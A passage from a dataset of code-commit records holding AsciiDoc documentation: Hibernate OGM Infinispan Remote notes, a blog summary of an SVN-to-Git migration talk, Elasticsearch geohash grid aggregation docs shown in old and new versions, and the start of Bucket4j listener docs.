Each cache has a name, and a consistent schema,\nand for each cache we define a key with some properties (the id, aka the primary key).\n\nRelations are mapped by encoding a \"foreign key\"; these are used either as keys to perform\na key lookup on another table, or in queries on other tables to identify\nrelations which have a higher than one cardinality.\n\nSo let's highlight the differences with the relational world:\n\nReferential integrity::\nWhile we can use relations based on foreign keys, Infinispan has no notion of referential integrity.\nHibernate is able to maintain the integrity as it won't \"forget\" stale references, but since\nthe storage doesn't support transactions either, it is possible to interrupt Hibernate OGM\nduring such maintenance and break integrity.\n\nA key. And a Value.::\nIn a key\/value store the two elements _key_ and _value_ are different, separate objects.\nThe schema - and consequently all operations - generated by Hibernate OGM will treat\nand encode these two objects separately. You will notice that the attributes of the key\nare encoded in the value *as well*, as it is not possible to run e.g. range queries\non attributes of keys.\n\nNo Sequences, no auto-incrementing values::\nInfinispan does not support sequences, yet allows concurrent \"compare and set\" operations;\nHibernate OGM makes use of such CAS operations to emulate sequences or auto-incrementing\nprimary keys if your entity mapping uses them; however, this solution might not work\nunder high load: make sure to use a different strategy, such as assigning IDs explicitly,\nor using the `org.hibernate.id.UUIDGenerator` generator.\nHibernate OGM will log a warning if it detects excessive spinning on such CAS operations.\n\nNot mapped to JDBC types, but to Protobuf types::\nRather than mapping your Java properties to corresponding JDBC (SQL) types, your Java\nproperties are mapped to Protobuf types.\nSee the https:\/\/developers.google.com\/protocol-buffers\/docs\/proto#scalar[protobuf documentation]\nfor an overview of protocol buffer \"primitive\" types.\n\n.Example auto-generated Protobuf Schema for a simple entity\n====\n[source, JAVA]\n----\nimport javax.persistence.Column;\nimport javax.persistence.Entity;\nimport javax.persistence.Id;\n\n@Entity\npublic class Hypothesis {\n\n\t@Id String id;\n\n\tString description;\n\n\t@Column(name = \"pos\")\n\tint position;\n\n}\n----\n[source]\n----\npackage HibernateOGMGenerated; # <1>\n\nmessage Hypothesis_id { # <2>\n\trequired string id = 1;\n}\n\nmessage Hypothesis {\n\trequired string id = 1;\n\toptional string description = 2;\n\toptional int32 pos = 3; # <3>\n}\n----\n<1> The default Protobuf package name.\n<2> A dedicated message type for the Key of the Key\/Value pair\n<3> The `pos` attribute name respects the option of the `@Column` annotation\n====\n\nThe above example shows what a Protobuf schema looks like, as automatically generated from a mapped entity.\nAny property type supported by Hibernate ORM will be converted to a matching Protobuf type.\n\n===== Each Table requires a Cache with the same name\n\nIn a relational database world, when Hibernate defines the schema this implicitly creates the tables;\nthis is not the case with Infinispan.\n\nWith Infinispan, the _Protobuf Schema_ just unlocks the capability to transmit messages with\nsuch payloads (read\/write), and allows the remote servers to process the fields, for example\nto execute queries and extract projections out of the stored entries.\nSo this establishes a transmission and storage encoding contract, but doesn't actually\nstart or allocate any storing Cache.\n\n
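To make this concrete, here is a sketch of how a cache backing the `Hypothesis` entity from the example above could be pre-defined in the Infinispan Server configuration; the exact elements and the clustering mode to pick depend on your Infinispan Server version, so treat this as an assumption to verify against its documentation:\n\n====\n[source, XML]\n----\n<cache-container>\n <!-- One pre-defined cache per \"table name\" generated from the mapping -->\n <distributed-cache name=\"Hypothesis\" \/>\n<\/cache-container>\n----\n====\n\n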
Hibernate OGM by convention will write to several named ``Cache``s, mapping each \"table name\"\nto a \"cache name\". In the above example, when having a `Hypothesis` entity this will\nwrite to a Cache named `Hypothesis`.\n\nThe benefit is that you can tune each cache (each \"table\") independently; for example you could\nconfigure the caches for the most important data to have a synchronous CacheStore which replicates\ndata to a relational database, and have less important entries use an asynchronous CacheStore,\nor none at all, to favour performance over redundancy.\n\nThe drawback of this design choice is that each named cache must be pre-defined in the Infinispan\nServer configuration: at this point, the Hot Rod protocol does not allow starting missing caches,\nso Hibernate OGM cannot define the missing tables automatically.\nIt generates the encoding Protobuf schema, but you have to list the Cache names in the server configuration.\n\n[WARNING]\n====\nFor each \"table name\" your model would generate on a relational database, you have to define\na matching Cache on the Infinispan Server.\n\nIf any Cache is missing, Hibernate OGM will fail to start and list which table names were\nexpected, but not found. We plan to automate the creation of missing caches in the future.\n====\n\n\n==== Known Limitations & Future improvements\n\nThe Infinispan Remote dataprovider has some known limitations, some of which are\nunsolvable without further development of Infinispan itself.\n\nTransaction Support::\nWe're eagerly waiting for Infinispan to support transactions over Hot Rod, as it\nalready provides this feature in Embedded Mode.\n\nQueries::\nAt this point the Hibernate OGM backend is able to run the queries it needs to materialize\nrelations, but does not yet translate JPQL queries nor Criteria queries to\nInfinispan remote queries.\n\nIndexing::\nInfinispan supports Hibernate Search annotations directly embedded within its protobuf\nschema definitions; this would enable the queries on them to use indexes.\nHibernate OGM doesn't generate these annotations in the schemas it generates yet.\n\nNative support for write skew checks::\nThe Hot Rod client has native support for versioning of datagrid entries, yet this is\nnot supported on all of the client APIs. For Hibernate OGM to be able to consistently\nuse versioning requires enhancements to the Hot Rod client API.\n\nEnums::\nProtobuf has native support for Enum types, yet the JPA annotations force you to choose\nbetween ordinal and string encoding. We might have to introduce a \"native\" encoding,\nprobably via a novel mapping annotation.\nHibernate OGM supports the native Protobuf encoding but the JPA metadata will always\nforce the ordinal or string representations.\n\nNesting and embedding::\nThe Protobuf schema could allow us to embed objects, including series of objects,\nas nested elements. 
This could allow mappings similar to the document-based NoSQL\nstores, such as our MongoDB dialect, but is not supported yet.\n\nAutomatic creation of ``Cache``s::\nWhen deploying the _Protobuf Schema_, we should also automatically define and start\nthe needed Caches if they are not defined.\nThis is currently not allowed over the Hot Rod protocol.\n\n","returncode":0,"stderr":"","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"890b0a9971eb7c6228e3e341a9574c6bc6e26219","subject":"Update 2015-04-30-How-Git-saved-our-project-or-nearly.adoc","message":"Update 2015-04-30-How-Git-saved-our-project-or-nearly.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2015-04-30-How-Git-saved-our-project-or-nearly.adoc","new_file":"_posts\/2015-04-30-How-Git-saved-our-project-or-nearly.adoc","new_contents":"= How Git saved our project? (or nearly...)\n:published_at: 2015-04-30\n:hp-tags: Devoxx France 2015, Git, migration\n:imagesdir: .\/images\n\nPresented at Devoxx France 2015 by C\u00e9cilia BOSSARD +\nSummary by Thomas SCHWENDER (Softeam StarTech Java)\n\n== An interesting feedback on a migration from SVN to Git\n\nIn a short time (as the quickies format requires), C\u00e9cilia expounded some advantages and issues when migrating a *really big* project from SVN to Git.\n\nHer project had several million lines of code, and was having problems when releasing a new version, because of some merge issues. +\nThese came mainly from the project size, and the number of different branches to merge at this moment.\n\nTo try to solve their problem, they made an analysis to check if they could migrate from SVN to Git, with a https:\/\/www.atlassian.com\/git\/tutorials\/comparing-workflows\/gitflow-workflow[Gitflow workflow].\n\nimage::how-Git-saved-our-project\/gitflow.jpg[title=\"the Gitflow workflow\"]\n\nAfter weeks of analysis, they first concluded that *it was not possible because of the whole size of the project*. +\nWith Git, *you effectively retrieve all the code on your local repository*. You can't do partial checkouts, contrary to SVN (see the note below for more details on this point).\n\nThen, considering http:\/\/git-scm.com\/about[the advantages of the migration], they decided to reduce the size of the project, by cleaning dead code.\nWith that, the 2nd conclusion was: let's go to Git!\n\n\n== Tips and things to remember\n\n* With Git, less disk space is required. +\nIn Git, *branches are only pointers*, contrary to SVN where they are file system copies.\n* Beware of the whole project size! + \nContrary to SVN, Git doesn't allow partial checkouts (feature called http:\/\/svnbook.red-bean.com\/en\/1.7\/svn.advanced.sparsedirs.html[_sparse directories_] in SVN). +\nSo, do not forget the housekeeping, and *clean dead code*!\n+\n[NOTE]\n====\nTo be more precise, since version 1.7.0, Git also enables sparse checkouts *for the working directory* (check http:\/\/schacon.github.io\/git\/git-read-tree.html#_sparse_checkout[here]).\nUnfortunately, *it does not affect the size of the overall local repository* (you *WILL* get the whole thing).\n====\n* Beware of https:\/\/help.github.com\/articles\/dealing-with-line-endings\/[line endings configuration].\n* Beware of the *encoding of your merge tool*. +\nRemember to configure it to use UTF-8.\n* *Get the `.git` out of the Eclipse workspace*, so as not to slow your IDE too much.\n\n\n\n\n\n\n\n","old_contents":"= How Git saved our project? 
(or nearly...)\n:published_at: 2015-04-30\n:hp-tags: Devoxx France 2015, Git, migration\n:imagesdir: .\/images\n\nPresented at Devoxx France 2015 by C\u00e9cilia BOSSARD +\nSummary by Thomas SCHWENDER (Softeam StarTech Java)\n\n== An interesting feedback on a migration from SVN to Git\n\nIn a short time (quickies format requires), C\u00e9cilia expounded some advantages and issues when migrating a *really big* project from SVN to Git.\n\nHer project was several millions of code lines, and was having problems when releasing a new version, because of some merge issues. +\nThose last came mainly from the project size, and the number of different branches to merge at this moment.\n\nTo try to solve their problem, they made an analysis to check if they could migrate from SVN to Git, with a https:\/\/www.atlassian.com\/git\/tutorials\/comparing-workflows\/gitflow-workflow[Gitflow workflow].\n\nimage::how-Git-saved-our-project\/gitflow.jpg[title=\"the Gitflow workflow\"]\n\nAfter weeks of analysis, they first conclude that *it was not possible because of the whole size of the project*. +\nWith Git, *you effectively retrieve all the code on your local repository*. You can't do partial checkouts, contrary to SVN (check the note below for a precision on this point).\n\nThen, thinking to http:\/\/git-scm.com\/about[the advantages of the migration], they decided the reduce the size of the project, by cleaning dead code.\nWith that, the 2nd conclusion was let's go to Git!\n\n\n== Tips and things to remember\n\n* With Git, less disk space is required. +\nAs for Git, *branch are only pointers*, contrary to SVN where they are file system copies.\n* Beware of the whole project size! + \nContrary to SVN, Git doesn't allow partial checkouts (feature called http:\/\/svnbook.red-bean.com\/en\/1.7\/svn.advanced.sparsedirs.html[_sparse directories_] in SVN). +\nSo, do not forget the housekeeping, and *clean dead code*!\n+\n[NOTE]\n====\nTo be more precised, since version 1.7.0, Git also enables sparce checkouts *for the working directory* (check http:\/\/schacon.github.io\/git\/git-read-tree.html#_sparse_checkout[here]).\nUnfortunately, *it does not affect the size of the overall local repository* (you *WILL* get the whole thing).\n====\n* Beware of https:\/\/help.github.com\/articles\/dealing-with-line-endings\/[line endings configuration].\n* Beware of the *encoding of your merge tool*. 
+\nThink to configure it to use UTF-8.\n* *get the `.git` out ouf the Eclipse workspace*, so as not to slow your IDE too much.\n\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"e53405f4f37f04d33a430caa1bbd7e0b742256f9","subject":"Update geohashgrid-aggregation.asciidoc (#21530)","message":"Update geohashgrid-aggregation.asciidoc (#21530)\n","repos":"henakamaMSFT\/elasticsearch,Shepard1212\/elasticsearch,brandonkearby\/elasticsearch,GlenRSmith\/elasticsearch,brandonkearby\/elasticsearch,mjason3\/elasticsearch,a2lin\/elasticsearch,MisterAndersen\/elasticsearch,rajanm\/elasticsearch,s1monw\/elasticsearch,henakamaMSFT\/elasticsearch,Helen-Zhao\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,elasticdog\/elasticsearch,artnowo\/elasticsearch,wuranbo\/elasticsearch,maddin2016\/elasticsearch,nilabhsagar\/elasticsearch,LewayneNaidoo\/elasticsearch,LeoYao\/elasticsearch,lks21c\/elasticsearch,GlenRSmith\/elasticsearch,sneivandt\/elasticsearch,rajanm\/elasticsearch,mjason3\/elasticsearch,elasticdog\/elasticsearch,rlugojr\/elasticsearch,nazarewk\/elasticsearch,vroyer\/elasticassandra,JSCooke\/elasticsearch,C-Bish\/elasticsearch,IanvsPoplicola\/elasticsearch,coding0011\/elasticsearch,mikemccand\/elasticsearch,StefanGor\/elasticsearch,MaineC\/elasticsearch,glefloch\/elasticsearch,jprante\/elasticsearch,uschindler\/elasticsearch,fred84\/elasticsearch,wenpos\/elasticsearch,bawse\/elasticsearch,vroyer\/elasticassandra,JervyShi\/elasticsearch,spiegela\/elasticsearch,masaruh\/elasticsearch,naveenhooda2000\/elasticsearch,maddin2016\/elasticsearch,rajanm\/elasticsearch,fforbeck\/elasticsearch,maddin2016\/elasticsearch,kalimatas\/elasticsearch,pozhidaevak\/elasticsearch,LewayneNaidoo\/elasticsearch,scottsom\/elasticsearch,artnowo\/elasticsearch,nknize\/elasticsearch,artnowo\/elasticsearch,mortonsykes\/elasticsearch,StefanGor\/elasticsearch,mikemccand\/elasticsearch,HonzaKral\/elasticsearch,pozhidaevak\/elasticsearch,a2lin\/elasticsearch,bawse\/elasticsearch,kalimatas\/elasticsearch,kalimatas\/elasticsearch,IanvsPoplicola\/elasticsearch,nezirus\/elasticsearch,s1monw\/elasticsearch,LeoYao\/elasticsearch,masaruh\/elasticsearch,i-am-Nathan\/elasticsearch,HonzaKral\/elasticsearch,JackyMai\/elasticsearch,C-Bish\/elasticsearch,winstonewert\/elasticsearch,obourgain\/elasticsearch,obourgain\/elasticsearch,Shepard1212\/elasticsearch,jprante\/elasticsearch,scorpionvicky\/elasticsearch,shreejay\/elasticsearch,LeoYao\/elasticsearch,sneivandt\/elasticsearch,gfyoung\/elasticsearch,Helen-Zhao\/elasticsearch,mjason3\/elasticsearch,kalimatas\/elasticsearch,fernandozhu\/elasticsearch,vroyer\/elassandra,Stacey-Gammon\/elasticsearch,coding0011\/elasticsearch,wuranbo\/elasticsearch,strapdata\/elassandra,njlawton\/elasticsearch,umeshdangat\/elasticsearch,MisterAndersen\/elasticsearch,obourgain\/elasticsearch,geidies\/elasticsearch,Stacey-Gammon\/elasticsearch,henakamaMSFT\/elasticsearch,qwerty4030\/elasticsearch,ZTE-PaaS\/elasticsearch,mortonsykes\/elasticsearch,LeoYao\/elasticsearch,masaruh\/elasticsearch,winstonewert\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,elasticdog\/elasticsearch,a2lin\/elasticsearch,wenpos\/elasticsearch,markwalkom\/elasticsearch,i-am-Nathan\/elasticsearch,JSCooke\/elasticsearch,gingerwizard\/elasticsearch,s1monw\/elasticsearch,JSCooke\/elasticsearch,uschindler\/elasticsearch,JervyShi\/elasticsearch,gfyoung\/elasticsearch,JervyShi\/elasticsearch,geidies\/elasticsearch,pozhidaevak\/elasticsearch,wuranbo\/elasticsearch,spiegela\/elasticsearch,rlugojr\/elastic
search,Helen-Zhao\/elasticsearch,JackyMai\/elasticsearch,rlugojr\/elasticsearch,yanjunh\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,Stacey-Gammon\/elasticsearch,njlawton\/elasticsearch,nilabhsagar\/elasticsearch,GlenRSmith\/elasticsearch,brandonkearby\/elasticsearch,robin13\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nezirus\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,sneivandt\/elasticsearch,shreejay\/elasticsearch,Stacey-Gammon\/elasticsearch,wangtuo\/elasticsearch,mohit\/elasticsearch,Helen-Zhao\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,elasticdog\/elasticsearch,IanvsPoplicola\/elasticsearch,ZTE-PaaS\/elasticsearch,umeshdangat\/elasticsearch,sneivandt\/elasticsearch,njlawton\/elasticsearch,mohit\/elasticsearch,scorpionvicky\/elasticsearch,pozhidaevak\/elasticsearch,lks21c\/elasticsearch,artnowo\/elasticsearch,yanjunh\/elasticsearch,geidies\/elasticsearch,JervyShi\/elasticsearch,s1monw\/elasticsearch,markwalkom\/elasticsearch,brandonkearby\/elasticsearch,jimczi\/elasticsearch,winstonewert\/elasticsearch,markwalkom\/elasticsearch,masaruh\/elasticsearch,vroyer\/elassandra,IanvsPoplicola\/elasticsearch,fernandozhu\/elasticsearch,fforbeck\/elasticsearch,LewayneNaidoo\/elasticsearch,coding0011\/elasticsearch,markwalkom\/elasticsearch,C-Bish\/elasticsearch,s1monw\/elasticsearch,C-Bish\/elasticsearch,masaruh\/elasticsearch,rlugojr\/elasticsearch,MisterAndersen\/elasticsearch,winstonewert\/elasticsearch,Stacey-Gammon\/elasticsearch,scottsom\/elasticsearch,strapdata\/elassandra,Shepard1212\/elasticsearch,jprante\/elasticsearch,alexshadow007\/elasticsearch,jimczi\/elasticsearch,wangtuo\/elasticsearch,ZTE-PaaS\/elasticsearch,coding0011\/elasticsearch,maddin2016\/elasticsearch,shreejay\/elasticsearch,wenpos\/elasticsearch,GlenRSmith\/elasticsearch,fernandozhu\/elasticsearch,coding0011\/elasticsearch,scottsom\/elasticsearch,i-am-Nathan\/elasticsearch,robin13\/elasticsearch,sneivandt\/elasticsearch,Shepard1212\/elasticsearch,HonzaKral\/elasticsearch,glefloch\/elasticsearch,a2lin\/elasticsearch,rajanm\/elasticsearch,Helen-Zhao\/elasticsearch,naveenhooda2000\/elasticsearch,LeoYao\/elasticsearch,nazarewk\/elasticsearch,nilabhsagar\/elasticsearch,winstonewert\/elasticsearch,naveenhooda2000\/elasticsearch,umeshdangat\/elasticsearch,StefanGor\/elasticsearch,mortonsykes\/elasticsearch,scorpionvicky\/elasticsearch,glefloch\/elasticsearch,shreejay\/elasticsearch,mohit\/elasticsearch,jimczi\/elasticsearch,nezirus\/elasticsearch,gfyoung\/elasticsearch,MaineC\/elasticsearch,uschindler\/elasticsearch,qwerty4030\/elasticsearch,bawse\/elasticsearch,henakamaMSFT\/elasticsearch,markwalkom\/elasticsearch,lks21c\/elasticsearch,njlawton\/elasticsearch,wuranbo\/elasticsearch,alexshadow007\/elasticsearch,mohit\/elasticsearch,naveenhooda2000\/elasticsearch,strapdata\/elassandra,umeshdangat\/elasticsearch,wuranbo\/elasticsearch,spiegela\/elasticsearch,ZTE-PaaS\/elasticsearch,alexshadow007\/elasticsearch,bawse\/elasticsearch,wenpos\/elasticsearch,spiegela\/elasticsearch,gingerwizard\/elasticsearch,mortonsykes\/elasticsearch,qwerty4030\/elasticsearch,StefanGor\/elasticsearch,alexshadow007\/elasticsearch,nezirus\/elasticsearch,MaineC\/elasticsearch,yanjunh\/elasticsearch,uschindler\/elasticsearch,geidies\/elasticsearch,MisterAndersen\/elasticsearch,Shepard1212\/elasticsearch,fforbeck\/elasticsearch,mortonsykes\/elasticsearch,glefloch\/elasticsearch,JSCooke\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,i-am-Nathan\/elasticsearch,bawse\/elasticsearch,Thi
agoGarciaAlves\/elasticsearch,wangtuo\/elasticsearch,nazarewk\/elasticsearch,nilabhsagar\/elasticsearch,jprante\/elasticsearch,naveenhooda2000\/elasticsearch,lks21c\/elasticsearch,uschindler\/elasticsearch,MaineC\/elasticsearch,kalimatas\/elasticsearch,fernandozhu\/elasticsearch,fernandozhu\/elasticsearch,jprante\/elasticsearch,wenpos\/elasticsearch,gingerwizard\/elasticsearch,jimczi\/elasticsearch,fred84\/elasticsearch,rlugojr\/elasticsearch,scottsom\/elasticsearch,robin13\/elasticsearch,fforbeck\/elasticsearch,shreejay\/elasticsearch,spiegela\/elasticsearch,mjason3\/elasticsearch,JackyMai\/elasticsearch,nazarewk\/elasticsearch,scottsom\/elasticsearch,qwerty4030\/elasticsearch,obourgain\/elasticsearch,i-am-Nathan\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,alexshadow007\/elasticsearch,fforbeck\/elasticsearch,umeshdangat\/elasticsearch,qwerty4030\/elasticsearch,a2lin\/elasticsearch,MaineC\/elasticsearch,IanvsPoplicola\/elasticsearch,njlawton\/elasticsearch,C-Bish\/elasticsearch,yanjunh\/elasticsearch,geidies\/elasticsearch,ZTE-PaaS\/elasticsearch,StefanGor\/elasticsearch,lks21c\/elasticsearch,strapdata\/elassandra,mikemccand\/elasticsearch,nazarewk\/elasticsearch,brandonkearby\/elasticsearch,glefloch\/elasticsearch,nilabhsagar\/elasticsearch,JervyShi\/elasticsearch,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,fred84\/elasticsearch,GlenRSmith\/elasticsearch,JackyMai\/elasticsearch,mjason3\/elasticsearch,LeoYao\/elasticsearch,obourgain\/elasticsearch,nknize\/elasticsearch,mohit\/elasticsearch,yanjunh\/elasticsearch,geidies\/elasticsearch,JackyMai\/elasticsearch,scorpionvicky\/elasticsearch,mikemccand\/elasticsearch,mikemccand\/elasticsearch,maddin2016\/elasticsearch,pozhidaevak\/elasticsearch,nknize\/elasticsearch,henakamaMSFT\/elasticsearch,JSCooke\/elasticsearch,LeoYao\/elasticsearch,vroyer\/elassandra,wangtuo\/elasticsearch,wangtuo\/elasticsearch,MisterAndersen\/elasticsearch,elasticdog\/elasticsearch,rajanm\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jimczi\/elasticsearch,gfyoung\/elasticsearch,LewayneNaidoo\/elasticsearch,LewayneNaidoo\/elasticsearch,nezirus\/elasticsearch,nknize\/elasticsearch,vroyer\/elasticassandra,gfyoung\/elasticsearch,artnowo\/elasticsearch,fred84\/elasticsearch,JervyShi\/elasticsearch,fred84\/elasticsearch","old_file":"docs\/reference\/aggregations\/bucket\/geohashgrid-aggregation.asciidoc","new_file":"docs\/reference\/aggregations\/bucket\/geohashgrid-aggregation.asciidoc","new_contents":"[[search-aggregations-bucket-geohashgrid-aggregation]]\n=== GeoHash grid Aggregation\n\nA multi-bucket aggregation that works on `geo_point` fields and groups points into buckets that represent cells in a grid.\nThe resulting grid can be sparse and only contains cells that have matching data. 
Each cell is labeled using a http:\/\/en.wikipedia.org\/wiki\/Geohash[geohash] which is of user-definable precision.\n\n* High precision geohashes have a long string length and represent cells that cover only a small area.\n* Low precision geohashes have a short string length and represent cells that each cover a large area.\n\nGeohashes used in this aggregation can have a choice of precision between 1 and 12.\n\nWARNING: The highest-precision geohash of length 12 produces cells that cover less than a square metre of land and so high-precision requests can be very costly in terms of RAM and result sizes.\nPlease see the example below on how to first filter the aggregation to a smaller geographic area before requesting high-levels of detail.\n\nThe specified field must be of type `geo_point` (which can only be set explicitly in the mappings) and it can also hold an array of `geo_point` fields, in which case all points will be taken into account during aggregation.\n\n\n==== Simple low-precision request\n\n[source,js]\n--------------------------------------------------\n{\n \"aggregations\" : {\n \"myLarge-GrainGeoHashGrid\" : {\n \"geohash_grid\" : {\n \"field\" : \"location\",\n \"precision\" : 3\n }\n }\n }\n}\n--------------------------------------------------\n\nResponse:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggregations\": {\n \"myLarge-GrainGeoHashGrid\": {\n \"buckets\": [\n {\n \"key\": \"svz\",\n \"doc_count\": 10964\n },\n {\n \"key\": \"sv8\",\n \"doc_count\": 3198\n }\n ]\n }\n }\n}\n--------------------------------------------------\n\n\n\n==== High-precision requests\n\nWhen requesting detailed buckets (typically for displaying a \"zoomed in\" map) a filter like <<query-dsl-geo-bounding-box-query,geo_bounding_box>> should be applied to narrow the subject area otherwise potentially millions of buckets will be created and returned.\n\n[source,js]\n--------------------------------------------------\n{\n \"aggregations\" : {\n \"zoomedInView\" : {\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"location\" : {\n \"top_left\" : \"51.73, 0.9\",\n \"bottom_right\" : \"51.55, 1.1\"\n }\n }\n },\n \"aggregations\":{\n \"zoom1\":{\n \"geohash_grid\" : {\n \"field\":\"location\",\n \"precision\":8\n }\n }\n }\n }\n }\n }\n--------------------------------------------------\n\n==== Cell dimensions at the equator\nThe table below shows the metric dimensions for cells covered by various string lengths of geohash.\nCell dimensions vary with latitude and so the table is for the worst-case scenario at the equator.\n\n[horizontal]\n*GeoHash length*::\t*Area width x height*\n1::\t 5,009.4km x 4,992.6km\n2::\t 1,252.3km x 624.1km\n3::\t 156.5km x 156km\n4::\t 39.1km x 19.5km\n5::\t 4.9km x 4.9km\n6::\t 1.2km x 609.4m\n7::\t 152.9m x 152.4m\n8::\t 38.2m x 19m\n9::\t 4.8m x 4.8m\n10::\t1.2m x 59.5cm\n11::\t14.9cm x 14.9cm\n12::\t3.7cm x 1.9cm\n\n\n\n==== Options\n\n[horizontal]\nfield:: Mandatory. The name of the field indexed with GeoPoints.\n\nprecision:: Optional. The string length of the geohashes used to define\n cells\/buckets in the results. Defaults to 5.\n\nsize:: Optional. The maximum number of geohash buckets to return\n (defaults to 10,000). When results are trimmed, buckets are\n prioritised based on the volumes of documents they contain.\n\nshard_size:: Optional. To allow for more accurate counting of the top cells\n returned in the final result the aggregation defaults to\n returning `max(10,(size x number-of-shards))` buckets from each\n shard. 
If this heuristic is undesirable, the number considered\n from each shard can be over-ridden using this parameter.\n","old_contents":"[[search-aggregations-bucket-geohashgrid-aggregation]]\n=== GeoHash grid Aggregation\n\nA multi-bucket aggregation that works on `geo_point` fields and groups points into buckets that represent cells in a grid.\nThe resulting grid can be sparse and only contains cells that have matching data. Each cell is labeled using a http:\/\/en.wikipedia.org\/wiki\/Geohash[geohash] which is of user-definable precision.\n\n* High precision geohashes have a long string length and represent cells that cover only a small area.\n* Low precision geohashes have a short string length and represent cells that each cover a large area.\n\nGeohashes used in this aggregation can have a choice of precision between 1 and 12.\n\nWARNING: The highest-precision geohash of length 12 produces cells that cover less than a square metre of land and so high-precision requests can be very costly in terms of RAM and result sizes.\nPlease see the example below on how to first filter the aggregation to a smaller geographic area before requesting high-levels of detail.\n\nThe specified field must be of type `geo_point` (which can only be set explicitly in the mappings) and it can also hold an array of `geo_point` fields, in which case all points will be taken into account during aggregation.\n\n\n==== Simple low-precision request\n\n[source,js]\n--------------------------------------------------\n{\n \"aggregations\" : {\n \"myLarge-GrainGeoHashGrid\" : {\n \"geohash_grid\" : {\n \"field\" : \"location\",\n \"precision\" : 3\n }\n }\n }\n}\n--------------------------------------------------\n\nResponse:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggregations\": {\n \"myLarge-GrainGeoHashGrid\": {\n \"buckets\": [\n {\n \"key\": \"svz\",\n \"doc_count\": 10964\n },\n {\n \"key\": \"sv8\",\n \"doc_count\": 3198\n }\n ]\n }\n }\n}\n--------------------------------------------------\n\n\n\n==== High-precision requests\n\nWhen requesting detailed buckets (typically for displaying a \"zoomed in\" map) a filter like <<query-dsl-geo-bounding-box-query,geo_bounding_box>> should be applied to narrow the subject area otherwise potentially millions of buckets will be created and returned.\n\n[source,js]\n--------------------------------------------------\n{\n \"aggregations\" : {\n \"zoomedInView\" : {\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"location\" : {\n \"top_left\" : \"51.73, 0.9\",\n \"bottom_right\" : \"51.55, 1.1\"\n }\n }\n },\n \"aggregations\":{\n \"zoom1\":{\n \"geohash_grid\" : {\n \"field\":\"location\",\n \"precision\":8,\n }\n }\n }\n }\n }\n }\n--------------------------------------------------\n\n==== Cell dimensions at the equator\nThe table below shows the metric dimensions for cells covered by various string lengths of geohash.\nCell dimensions vary with latitude and so the table is for the worst-case scenario at the equator.\n\n[horizontal]\n*GeoHash length*::\t*Area width x height*\n1::\t 5,009.4km x 4,992.6km\n2::\t 1,252.3km x 624.1km\n3::\t 156.5km x 156km\n4::\t 39.1km x 19.5km\n5::\t 4.9km x 4.9km\n6::\t 1.2km x 609.4m\n7::\t 152.9m x 152.4m\n8::\t 38.2m x 19m\n9::\t 4.8m x 4.8m\n10::\t1.2m x 59.5cm\n11::\t14.9cm x 14.9cm\n12::\t3.7cm x 1.9cm\n\n\n\n==== Options\n\n[horizontal]\nfield:: Mandatory. The name of the field indexed with GeoPoints.\n\nprecision:: Optional. 
The string length of the geohashes used to define\n cells\/buckets in the results. Defaults to 5.\n\nsize:: Optional. The maximum number of geohash buckets to return\n (defaults to 10,000). When results are trimmed, buckets are\n prioritised based on the volumes of documents they contain.\n\nshard_size:: Optional. To allow for more accurate counting of the top cells\n returned in the final result the aggregation defaults to\n returning `max(10,(size x number-of-shards))` buckets from each\n shard. If this heuristic is undesirable, the number considered\n from each shard can be over-ridden using this parameter.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d22a70fbfd101a96cf7e7abac7aad5c5fae6937a","subject":"listener.adoc","message":"listener.adoc\n","repos":"vladimir-bukhtoyarov\/bucket4j,vladimir-bukhtoyarov\/bucket4j,vladimir-bukhtoyarov\/bucket4j,vladimir-bukhtoyarov\/bucket4j","old_file":"asciidoc\/src\/main\/docs\/asciidoc\/advanced\/listener.adoc","new_file":"asciidoc\/src\/main\/docs\/asciidoc\/advanced\/listener.adoc","new_contents":"[[listener]]\n=== Listening for bucket events\n\n==== What can be listened\n.You can decorate the bucket with a listener to track the following events:\n- When tokens are consumed from a bucket.\n- When consumption requests were rejected by the bucket.\n- When the thread was parked to wait for tokens to be refilled as a result of interaction with ``BlockingBucket``.\n- When the thread was interrupted during the wait for tokens to be refilled as a result of interaction with ``BlockingBucket``.\n- When a delayed task was submitted to ``ScheduledExecutorService`` as a result of interaction with ``AsyncScheduledBucket``.\n\n==== Listener API - corner cases\n========\n**Question:** How many listeners are needed to create an application that uses many buckets?\n\n**Answer:** It depends:\n\n- If you want to have aggregated statistics for all buckets then create a single listener per application and reuse this listener for all buckets.\n- If you want to measure statistics independently per bucket then use a listener per bucket model.\n========\n\n========\n**Question:** Where are the listener methods invoked in case of distributed usage?\n\n**Answer:** The listener is always invoked on the client-side, which means that each client JVM will have its own independent stats for the same bucket.\n========\n\n========\n**Question:** Why does the bucket invoke the listener on the client-side instead of the server-side in a distributed scenario? 
